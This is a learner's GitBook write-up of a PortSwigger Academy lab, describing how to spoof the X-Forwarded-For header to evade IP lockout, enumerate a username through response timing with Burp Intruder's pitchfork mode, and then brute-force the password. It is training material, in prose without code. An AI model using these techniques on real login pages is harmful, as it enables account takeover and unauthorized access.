Cyber Security / Ethical Hacking
  • Prologue
  • CTF/OSCP Prep
    • Fundamentals
      • Linux
        • Basics
        • Bash Scripting
      • Windows
        • Basics
        • PowerShell
          • Scripting
        • CMD
      • Kali Survivor Skills
    • Information Gathering
      • Passive Recon
      • Active Recon
    • Enumeration
      • Common Ports
      • Vulnerability Analysis
    • Exploitation
      • Shells
  • Binary Exploitation / Exploit Development
    • Useful tools and techniques for Binary Exploitation
    • Shellcoders Handbook
      • Chapter 2 - Stack Overflows
        • Linux Buffer Overflow With Command Injection
        • Linux Buffer Overflow Without Shellcode
      • Chapter 3 - Shellcode
  • TryHackMe
    • Linux Fundamentals
      • Linux Challenges
      • RP: tmux
      • Common Linux Privesc
    • Advent of Cyber
      • Inventory Management
      • Arctic Forum
      • Evil Elf
      • Training
      • Ho-Ho-Hosint
      • Data Elf-iltration
      • Skilling Up
      • SUID Shenanigans
      • Requests
      • Metasploit-a-ho-ho-ho
      • Elf Applications
      • Elfcryption
      • Accumulate
      • Unknown Storage
    • Web Application Security
      • Web Fundamentals
      • Juice Shop
      • WebAppSec 101
    • Linux Privesc Playground
    • Intro to x86-64
    • Ninja Skills
    • CC: Radare2
    • Reversing ELF
    • Intro to Python
    • ToolsRus
  • Programming
    • Python
      • Simple TCP Port Scanner/ Banner Grabber
      • Botnet
      • Keylogger
      • Nmap Scanner
    • Golang
      • Execute Commands
      • MAC changer
      • TCP Port Scanner
      • TCP Port Scanner (improved with goroutines)
      • GoNmap Scanner
  • Protostar
    • Stack 0
    • Stack 1
    • Stack 2
  • Web App Pentesting
    • Recon
    • Authentication (Portswigger Academy)
      • Vulnerabilities in password-based login
        • Username Enumeration via different responses
        • Username enumeration via subtly different responses
        • Username enumeration via response timing
        • Broken brute-force protection, IP block
        • Username enumeration via account lock
        • Broken brute-force protection, multiple credentials per request
      • Vulnerabilities in multi-factor authentication
        • 2FA simple bypass
        • 2FA Broken Logic
        • 2FA bypass using a brute-force attack
      • Vulnerabilities in other authentication mechanisms
    • Broken Acess Controls
      • Insecure direct object references (IDOR)
        • Insecure direct object references lab
  • HackTheBox
    • Active
      • Untitled
      • Blunder
Powered by GitBook
On this page

Was this helpful?

  1. Web App Pentesting
  2. Authentication (Portswigger Academy)
  3. Vulnerabilities in password-based login

Username enumeration via response timing

PreviousUsername enumeration via subtly different responsesNextBroken brute-force protection, IP block

Last updated 4 years ago

Was this helpful?

This lab has increased difficulty compared to the other two. The first thing to notice is that it implements a form of IP-based brute-force protection. In the lab description it says this can be easily bypassed by manipulating HTTP request headers.

The hints section mentions the "X-Forwarded-For" HTTP header. A quick google-fu and we can find some definition of it.

Once we do some unsuccessful login attempts the login is blocked for 30 min.

So lets try to spoof our IP address the "X-Forwarded-For" header by sending the request to the repeater.

Using this header and setting it to one managed to spoofed our IP address, and we are not blocked anymore.

Also, by using repeater with a correct username ("wiener") and different length passwords, we can see that the response time increases the bigger the password we are using.

The next step is to send the request to intruder to perform the brute-force attack, but this time we need two payloads: one to increase the value of the "X-Forwareded-For" header, and one with the usernames dictionary. To do this, instead of the sniper attack type we need to use the pitchfork attack.

For the first payload we will use the "numbers" payload type, to increment the header by 1 each iteration. Since the usernames list only has 100 usernames, we only need to increment it 100 times.

The second payload will be a simple list, like the one used in the previous labs.

To see which username is the correct one, we need to check the response times. To do that, we can click (in the attack window) "Columns" and select the "Response received" and "Response completed". In this case, the response time for the username "guest" was significantly longer than the other ones, so we can try to brute-force with the passwords wordlist to find the "302" response.

Using this password we can complete the lab.